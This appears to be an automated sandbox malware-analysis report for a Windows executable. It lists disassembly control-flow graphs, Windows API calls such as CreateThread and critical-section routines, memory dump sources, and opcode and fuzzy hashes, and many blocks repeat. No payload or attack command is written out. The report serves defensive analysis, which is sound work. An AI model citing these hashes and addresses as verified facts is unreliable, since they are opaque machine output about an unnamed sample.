                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: RO$Once$~
                                                • API String ID: 0-3270136502
                                                • Opcode ID: 15041839a937713746e3f4312b3675876991312ceadf5e83856370eba5ccc6e5
                                                • Instruction ID: 1667f987b5a64c16821490a26d3e430a305355326ab2a6fdd53f3992641b3f76
                                                • Opcode Fuzzy Hash: 15041839a937713746e3f4312b3675876991312ceadf5e83856370eba5ccc6e5
                                                • Instruction Fuzzy Hash: E772E771910218EFDB14EFA0EE48AEEBB75FF58301F108169F506A72B0DB345A49CB58

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1274 425cbc-425cbe 1275 425cc4-425cce SysAllocStringLen 1274->1275 1276 425bc8-425bcc 1274->1276 1279 425cd4-425cde SysFreeString 1275->1279 1280 425b98-4261dc 1275->1280 1277 425bce-425bdb SysFreeString 1276->1277 1278 425bdc 1276->1278 1277->1278 1282 4261f6 1280->1282 1283 4261de-4261ee SysAllocStringLen 1280->1283 1283->1280 1284 4261f4 1283->1284 1284->1282
                                                APIs
                                                • SysFreeString.OLEAUT32(?), ref: 00425BD6
                                                • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00425CC7
                                                • SysFreeString.OLEAUT32(?), ref: 00425CD9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: String$Free$Alloc
                                                • String ID:
                                                • API String ID: 986138563-0
                                                • Opcode ID: b7aebef3d79b8450d319c4c4da04c147d64d58193a8f4b3ee7ca1fec841c71a3
                                                • Instruction ID: 3eae97abf8ecebea3d74af2ed52a13b421a08b1f32e908a3b18502d36c4b6d2c
                                                • Opcode Fuzzy Hash: b7aebef3d79b8450d319c4c4da04c147d64d58193a8f4b3ee7ca1fec841c71a3
                                                • Instruction Fuzzy Hash: 9CE0ECB83016216DEE156F32AD01B372B29AF81711BE5495EF8009A215DA7CAC41662D
                                                APIs
                                                • SysFreeString.OLEAUT32(?), ref: 00425BD6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeString
                                                • String ID: "lB
                                                • API String ID: 3341692771-2501005195
                                                • Opcode ID: 7f1c94e0d7d00539a662d5e416c93b2d65ca24bdfd2f6e8adb07ea5ed58003b8
                                                • Instruction ID: 2e196b39daa8764921be558a5a387240bacd155c0bdd8e0ce52a32d021dcfd8b
                                                • Opcode Fuzzy Hash: 7f1c94e0d7d00539a662d5e416c93b2d65ca24bdfd2f6e8adb07ea5ed58003b8
                                                • Instruction Fuzzy Hash: 60B092B42022106EE6119B21AC40B27362AABC1711FB9898AA8008A128CB7CAC019628

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1285 42342c-42343c 1286 423447-42344d 1285->1286 1287 42343e call 422bd0 1285->1287 1289 423459-42346e 1286->1289 1290 42344f-423454 1286->1290 1291 423443-423445 1287->1291 1293 423470-423475 RtlEnterCriticalSection 1289->1293 1294 42347a-423483 1289->1294 1292 4235cf-4235d6 1290->1292 1291->1286 1291->1290 1293->1294 1295 423485 1294->1295 1296 42348a-423490 1294->1296 1295->1296 1297 423542-423548 1296->1297 1298 423496-42349a 1296->1298 1301 42354a-423557 1297->1301 1302 42359d-42359f call 4232e4 1297->1302 1299 42349f-4234b3 1298->1299 1300 42349c 1298->1300 1299->1297 1304 4234b9-4234d6 1299->1304 1300->1299 1305 423566-42359b call 424e24 1301->1305 1306 423559-423561 1301->1306 1307 4235a4-4235bb 1302->1307 1308 4234e6-42350a 1304->1308 1309 4234d8-4234e4 1304->1309 1305->1292 1306->1305 1314 4235c7 1307->1314 1315 4235bd-4235c2 RtlLeaveCriticalSection 1307->1315 1312 42350c-42353d call 424e24 1308->1312 1309->1312 1312->1292 1315->1314
                                                APIs
                                                  • Part of subcall function 00422BD0: RtlInitializeCriticalSection.NTDLL(0051C5CC), ref: 00422BE7
                                                  • Part of subcall function 00422BD0: RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00422BFA
                                                  • Part of subcall function 00422BD0: LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00422C98,?,00000000,?,004235F6,00000000), ref: 00422C24
                                                  • Part of subcall function 00422BD0: RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 00422C92
                                                • RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00423475
                                                • RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 004235C2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                • String ID:
                                                • API String ID: 2227675388-0
                                                • Opcode ID: a152c6f849179c42758c856f24fc3218e7e89dae70e758f92901cddfe6e35a0e
                                                • Instruction ID: 598cdeddc025ade9b9916cc483952d390fd687b2127ecc3d21840085fc418226
                                                • Opcode Fuzzy Hash: a152c6f849179c42758c856f24fc3218e7e89dae70e758f92901cddfe6e35a0e
                                                • Instruction Fuzzy Hash: 6F51A0B0B40315EFDB10CF68E9806AEBBF1FB58305F6081AAD40597351D339AA81CF49

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1285 42342c-42343c 1286 423447-42344d 1285->1286 1287 42343e call 422bd0 1285->1287 1289 423459-42346e 1286->1289 1290 42344f-423454 1286->1290 1291 423443-423445 1287->1291 1293 423470-423475 RtlEnterCriticalSection 1289->1293 1294 42347a-423483 1289->1294 1292 4235cf-4235d6 1290->1292 1291->1286 1291->1290 1293->1294 1295 423485 1294->1295 1296 42348a-423490 1294->1296 1295->1296 1297 423542-423548 1296->1297 1298 423496-42349a 1296->1298 1301 42354a-423557 1297->1301 1302 42359d-42359f call 4232e4 1297->1302 1299 42349f-4234b3 1298->1299 1300 42349c 1298->1300 1299->1297 1304 4234b9-4234d6 1299->1304 1300->1299 1305 423566-42359b call 424e24 1301->1305 1306 423559-423561 1301->1306 1307 4235a4-4235bb 1302->1307 1308 4234e6-42350a 1304->1308 1309 4234d8-4234e4 1304->1309 1305->1292 1306->1305 1314 4235c7 1307->1314 1315 4235bd-4235c2 RtlLeaveCriticalSection 1307->1315 1312 42350c-42353d call 424e24 1308->1312 1309->1312 1312->1292 1315->1314
                                                APIs
                                                  • Part of subcall function 00422BD0: RtlInitializeCriticalSection.NTDLL(0051C5CC), ref: 00422BE7
                                                  • Part of subcall function 00422BD0: RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00422BFA
                                                  • Part of subcall function 00422BD0: LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00422C98,?,?,?,004235F6), ref: 00422C24
                                                  • Part of subcall function 00422BD0: RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 00422C92
                                                • RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00423475
                                                • RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 004235C2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                • String ID:
                                                • API String ID: 2227675388-0
                                                • Opcode ID: a152c6f849179c42758c856f24fc3218e7e89dae70e758f92901cddfe6e35a0e
                                                • Instruction ID: 598cdeddc025ade9b9916cc483952d390fd687b2127ecc3d21840085fc418226
                                                • Opcode Fuzzy Hash: a152c6f849179c42758c856f24fc3218e7e89dae70e758f92901cddfe6e35a0e
                                                • Instruction Fuzzy Hash: 6F51A0B0B40315EFDB10CF68E9806AEBBF1FB58305F6081AAD40597351D339AA81CF49

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1318 425c04-425c06 1319 425bc8-425bcc 1318->1319 1320 425c0c-425c11 1318->1320 1322 425bce-425bdb SysFreeString 1319->1322 1323 425bdc 1319->1323 1320->1319 1321 425c17-425c21 SysReAllocStringLen 1320->1321 1324 425c27 1321->1324 1325 425b98-4261dc 1321->1325 1322->1323 1327 4261f6 1325->1327 1328 4261de-4261ee SysAllocStringLen 1325->1328 1328->1325 1329 4261f4 1328->1329 1329->1327
                                                APIs
                                                • SysFreeString.OLEAUT32(?), ref: 00425BD6
                                                • SysReAllocStringLen.OLEAUT32(?,?,?), ref: 00425C1A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: String$AllocFree
                                                • String ID:
                                                • API String ID: 344208780-0
                                                • Opcode ID: df0683008a577a838ccdc220bd5f6f3581af13251a19c4261ec83605024432ba
                                                • Instruction ID: 1ef83d56cbdf2652bb4066a39517635c9c34684a331697f53fb0bb73bc7ca3e4
                                                • Opcode Fuzzy Hash: df0683008a577a838ccdc220bd5f6f3581af13251a19c4261ec83605024432ba
                                                • Instruction Fuzzy Hash: FAD012B43006216DEE149A25A901A372A7A9FD1722BE9864EB8019A245DA7CAC01962C

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1274 425cbc-425cbe 1275 425cc4-425cce SysAllocStringLen 1274->1275 1276 425bc8-425bcc 1274->1276 1279 425cd4-425cde SysFreeString 1275->1279 1280 425b98-4261dc 1275->1280 1277 425bce-425bdb SysFreeString 1276->1277 1278 425bdc 1276->1278 1277->1278 1282 4261f6 1280->1282 1283 4261de-4261ee SysAllocStringLen 1280->1283 1283->1280 1284 4261f4 1283->1284 1284->1282
                                                APIs
                                                • SysFreeString.OLEAUT32(?), ref: 00425BD6
                                                • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00425CC7
                                                • SysFreeString.OLEAUT32(?), ref: 00425CD9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: String$Free$Alloc
                                                • String ID:
                                                • API String ID: 986138563-0
                                                • Opcode ID: 308a7aafaf9d322d9ecf3211dcc17ae404bb47fc175962d744962761ac206455
                                                • Instruction ID: cbaea90cfe0a1cdcadef06621e82d72bada6575d22204afc7710c3a6c6e047bf
                                                • Opcode Fuzzy Hash: 308a7aafaf9d322d9ecf3211dcc17ae404bb47fc175962d744962761ac206455
                                                • Instruction Fuzzy Hash: E6C04CA83417227DBF156B726E05E3B6B6CAD813153C4496EFC1095252DABCEC40652D

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1330 415660-41573c 1341 415742-415745 1330->1341 1342 415d28-415d2f 1330->1342 1341->1342 1343 41574b-415777 call 40ee70 1341->1343 1350 4158e3-4158fc 1343->1350 1351 41577d-415810 call 40ee70 1343->1351 1356 4158fd-415909 call 40eab0 1350->1356 1378 4158c7-4158e1 1351->1378 1379 415816-415885 call 40ee70 call 40eab0 1351->1379 1363 415912-415976 1356->1363 1385 41597d-415982 1363->1385 1378->1356 1379->1342 1444 41588b-4158a3 1379->1444 1386 415a25-415a65 1385->1386 1387 415988-415992 1385->1387 1404 415a67-415a6e 1386->1404 1387->1342 1390 415998-41599e 1387->1390 1392 4159a0-4159cc 1390->1392 1393 4159d7-4159d9 1390->1393 1392->1342 1423 4159d2-4159d5 1392->1423 1393->1342 1395 4159df-4159e2 1393->1395 1395->1342 1396 4159e8-415a20 1395->1396 1396->1385 1406 415b11-415b18 1404->1406 1407 415a74-415a97 1404->1407 1410 415b25-415b2b 1406->1410 1411 415b1a-415b1f call 404c14 1406->1411 1419 415a99-415a9d 1407->1419 1420 415abd 1407->1420 1410->1342 1416 415b31-415b59 1410->1416 1411->1410 1416->1342 1422 415b5f 1416->1422 1419->1420 1426 415a9f-415aad 1419->1426 1428 415ac3-415ad9 1420->1428 1427 415b66-415b69 1422->1427 1423->1385 1426->1428 1431 415aaf-415abb 1426->1431 1429 415b92-415b98 1427->1429 1430 415b6b-415b87 1427->1430 1432 415d23 1428->1432 1433 415adf-415b04 1428->1433 1429->1342 1435 415b9e-415bcf 1429->1435 1430->1342 1447 415b8d-415b90 1430->1447 1431->1428 1432->1342 1433->1342 1448 415b0a-415b0c 1433->1448 1435->1432 1445 415bd5-415bed 1435->1445 1453 4158a5-4158a7 1444->1453 1454 4158a9-4158ae 1444->1454 1455 415bfa-415c2e 1445->1455 1456 415bef-415bf4 call 404c14 1445->1456 1447->1427 1448->1404 1453->1454 1458 4158b1-4158b3 1453->1458 1454->1458 1455->1342 1465 415c34-415c37 1455->1465 1456->1455 1458->1342 1461 4158b9-4158bc 1458->1461 1461->1342 1462 4158c2-4158c5 1461->1462 1462->1363 1465->1342 1466 415c3d-415d0b 1465->1466
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 0000
                                                • API String ID: 0-211534962
                                                • Opcode ID: 0adc0da8b6ac4ccf3f743cce2cbfe1a6654ea4958e7f599bc5796df7d377838d
                                                • Instruction ID: 53a986e52e39fbf970cbf615d3a1ec69ca294c6c8782ac2c6b5e72a9cd1184f1
                                                • Opcode Fuzzy Hash: 0adc0da8b6ac4ccf3f743cce2cbfe1a6654ea4958e7f599bc5796df7d377838d
                                                • Instruction Fuzzy Hash: C0122DB1E00248DFDB14DBE4DD89ADDBBB5FF88301F10412AE506A72A0DB745985CF59

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1483 411590-41167e call 4025e0 1497 411684-411687 1483->1497 1498 411cff-411d05 1483->1498 1497->1498 1499 41168d-41169b 1497->1499 1500 4116a1-411770 call 40ee70 * 2 1499->1500 1501 41179f-4117b6 1499->1501 1528 411781-411798 1500->1528 1529 411772-4117c8 1500->1529 1507 411c91-411ce7 1501->1507 1528->1507 1529->1498 1533 4117ce-411816 1529->1533 1533->1498 1539 41181c-41181f 1533->1539 1539->1498 1540 411825-4118d3 call 40fba0 1539->1540 1551 4118d9-4118e6 1540->1551 1552 4119d6-411acb call 40fba0 1551->1552 1553 4118ec-4118f9 1551->1553 1586 411ad1-411ade 1552->1586 1553->1498 1554 4118ff-411905 1553->1554 1555 411907-411951 1554->1555 1556 41195c-411969 1554->1556 1555->1498 1572 411957-41195a 1555->1572 1556->1498 1558 41196f-411972 1556->1558 1558->1498 1561 411978-4119cb 1558->1561 1575 4119d1 1561->1575 1572->1575 1575->1551 1587 411ae4-411af1 1586->1587 1588 411bdb-411c8b 1586->1588 1587->1498 1589 411af7-411afd 1587->1589 1588->1507 1591 411b54-411b61 1589->1591 1592 411aff-411b49 1589->1592 1591->1498 1593 411b67-411b6a 1591->1593 1592->1498 1606 411b4f-411b52 1592->1606 1593->1498 1594 411b70-411bc3 1593->1594 1609 411bc9-411bd6 1594->1609 1606->1609 1609->1586
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: E
                                                • API String ID: 0-3568589458
                                                • Opcode ID: 9141550b6d6829455b6e08a61abb0c99e7e0684e9f5b713fbc30798890655fad
                                                • Instruction ID: 2c3bdc2995cc32bb6ddafcd024d806e85dbf0c974109c8e670926915eacf5b68
                                                • Opcode Fuzzy Hash: 9141550b6d6829455b6e08a61abb0c99e7e0684e9f5b713fbc30798890655fad
                                                • Instruction Fuzzy Hash: 8322E6B1900249EBDB04DFE0DA48ADEBBB5FF48305F108129E602B76A0DB745A85DB58

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1618 408d7c-408d87 1619 40abac-40ac9b call 4025e0 call 418c90 * 2 1618->1619 1620 408d8d-408d9c 1618->1620 1622 408da2-409172 call 410180 * 4 1620->1622 1623 4091be-4091da 1620->1623 1996 409177-4091b9 1622->1996 1630 4091e0-409209 call 4125a0 1623->1630 1631 40948c-4094a8 1623->1631 1637 40924b-409296 1630->1637 1638 40920b-409244 call 40fba0 call 415660 1630->1638 1640 409b34-409c97 call 40ee70 * 2 call 411590 1631->1640 1641 4094ae-4094c7 call 4125a0 1631->1641 1672 409298-4092a4 call 404c14 1637->1672 1673 4092aa-40933d call 40ee70 1637->1673 1638->1637 1762 409c99-409ca6 1640->1762 1763 409cab-409cc4 call 4125a0 1640->1763 1652 409509-409582 1641->1652 1653 4094c9-409502 call 40fba0 call 415660 1641->1653 1695 409584-4095a5 1652->1695 1696 4095a7 1652->1696 1653->1652 1672->1673 1714 409362 1673->1714 1715 40933f-409360 1673->1715 1698 4095b1-409646 call 410fb0 call 40ee70 1695->1698 1696->1698 1745 4097e2-409858 call 410fb0 call 40ee70 1698->1745 1746 40964c-4097dd call 40ee70 * 2 1698->1746 1719 40936c-4093ff call 410780 1714->1719 1715->1719 1777 409405-40947e 1719->1777 1778 409487 1719->1778 1804 409aad-409af7 1745->1804 1805 40985e-40986c 1745->1805 1746->1804 1773 409dec-409e82 call 40ee70 * 2 1762->1773 1772 409cca-409ce4 1763->1772 1763->1773 1786 40aba7 1772->1786 1787 409cea-409db1 call 410180 call 40fba0 call 415660 1772->1787 1861 409e89-409ea9 1773->1861 1777->1778 1779 409ee9-40a26c call 418c90 * 2 call 418a10 * 2 call 40ee70 * 7 1778->1779 2006 40a272-40a2b9 call 40f8f0 1779->2006 2007 40aa5b-40aa71 call 40f1d0 1779->2007 1786->1786 1901 409db3 1787->1901 1902 409db5-409dd0 1787->1902 1843 409af9-409b1a 1804->1843 1844 409b1c 1804->1844 1809 40988a 1805->1809 1810 40986e-409888 1805->1810 1816 409894-4098c7 1809->1816 1810->1816 1828 4098c9-4098ea 1816->1828 1829 4098ec 1816->1829 1835 4098f6-409924 1828->1835 1829->1835 1850 409926-409947 1835->1850 1851 409949 1835->1851 1848 409b26-409b2f 1843->1848 1844->1848 1848->1779 1858 409953-409aaa 1850->1858 1851->1858 1858->1804 1861->1786 1903 409dd6-409de5 1901->1903 1902->1787 1902->1903 1903->1773 2020 40a329-40a370 call 40f8f0 2006->2020 2021 40a2bb-40a320 2006->2021 2011 40aa73-40aa7a call 40f1a0 2007->2011 2012 40aa7f-40aac9 2007->2012 2011->2012 2023 40aacb-40aaec 2012->2023 2024 40aaee 2012->2024 2040 40a3e0-40a427 call 40f8f0 2020->2040 2041 40a372-40a3d7 2020->2041 2021->2020 2027 40aaf8-40ab84 2023->2027 2024->2027 2053 40a497-40a4de call 40f8f0 2040->2053 2054 40a429-40a48e 2040->2054 2041->2040 2066 40a4e0-40a545 2053->2066 2067 40a54e-40a595 call 40f8f0 2053->2067 2054->2053 2066->2067 2079 40a605-40a64c call 40f8f0 2067->2079 2080 40a597-40a5fc 2067->2080 2092 40a6bc-40a703 call 40f8f0 2079->2092 2093 40a64e-40a6b3 2079->2093 2080->2079 2105 40a773-40a7ba call 40f8f0 2092->2105 2106 40a705-40a76a 2092->2106 2093->2092 2118 40a82a-40a871 call 40f8f0 2105->2118 2119 40a7bc-40a821 2105->2119 2106->2105 2131 40a8e1-40a928 call 40f8f0 2118->2131 2132 40a873-40a8d8 2118->2132 2119->2118 2144 40a998-40a9df call 40f8f0 2131->2144 2145 40a92a-40a98f 2131->2145 2132->2131 2157 40a9e1-40aa46 2144->2157 2158 40aa4f-40aa56 2144->2158 2145->2144 2157->2158
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: D
                                                • API String ID: 0-2746444292
                                                • Opcode ID: f9e37a6dceaf84c98bfe42f1550ad70babc89238222ada09e67fe6c6bff90c65
                                                • Instruction ID: 28a137cb3eb25e758eafbfe2ee42426fba9f6ce594aea99c4a1f109bb6dd76d7
                                                • Opcode Fuzzy Hash: f9e37a6dceaf84c98bfe42f1550ad70babc89238222ada09e67fe6c6bff90c65
                                                • Instruction Fuzzy Hash: 7CE1B876900104EFD705EBE0EE989DF7BB9EB4C301B10812AF617A7264DF745A45CBA8
                                                APIs
                                                • LoadStringA.USER32(00000000,0000FF84,?,00001000), ref: 00427892
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LoadString
                                                • String ID:
                                                • API String ID: 2948472770-0
                                                • Opcode ID: 8796358e6523dfde688f4884a08ea08aa8a30318939fa9443135e4f43c793457
                                                • Instruction ID: 22544c539b725ec5b4ac43c57f7f09c783e7cdc452e560019d01f461da980ed3
                                                • Opcode Fuzzy Hash: 8796358e6523dfde688f4884a08ea08aa8a30318939fa9443135e4f43c793457
                                                • Instruction Fuzzy Hash: B0F0A0727005209FCB10EA5DE8C2B8633DC4F4C348B548066B548CB359DB78CC44C7AA
                                                APIs
                                                • LoadStringA.USER32(00000000,0000FFF4,?,00001000), ref: 00427892
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LoadString
                                                • String ID:
                                                • API String ID: 2948472770-0
                                                • Opcode ID: 73449cd31783198abe0234b761cb9d43333b180b61f606bf4a20dae5c641b838
                                                • Instruction ID: 22544c539b725ec5b4ac43c57f7f09c783e7cdc452e560019d01f461da980ed3
                                                • Opcode Fuzzy Hash: 73449cd31783198abe0234b761cb9d43333b180b61f606bf4a20dae5c641b838
                                                • Instruction Fuzzy Hash: B0F0A0727005209FCB10EA5DE8C2B8633DC4F4C348B548066B548CB359DB78CC44C7AA
                                                APIs
                                                • CreateThread.KERNEL32(?,?,Function_00004428,00000000,?,?), ref: 00425496
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 983363b32a7dd6747033d111e2c59e60e1eba936680b0ce3877a97b211a9736e
                                                • Instruction ID: cc400aaec5f98775912378b72cba36d114b7af17ff567da94c7c96793c6a670b
                                                • Opcode Fuzzy Hash: 983363b32a7dd6747033d111e2c59e60e1eba936680b0ce3877a97b211a9736e
                                                • Instruction Fuzzy Hash: 5BE0C9B2301224BFD300DA5EAC44E9BBBECDFD9365B50C16AB90CC7221D5759C0186B4
                                                APIs
                                                • CreateThread.KERNEL32(?,?,Function_00025428,00000000,?,?), ref: 00425496
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 983363b32a7dd6747033d111e2c59e60e1eba936680b0ce3877a97b211a9736e
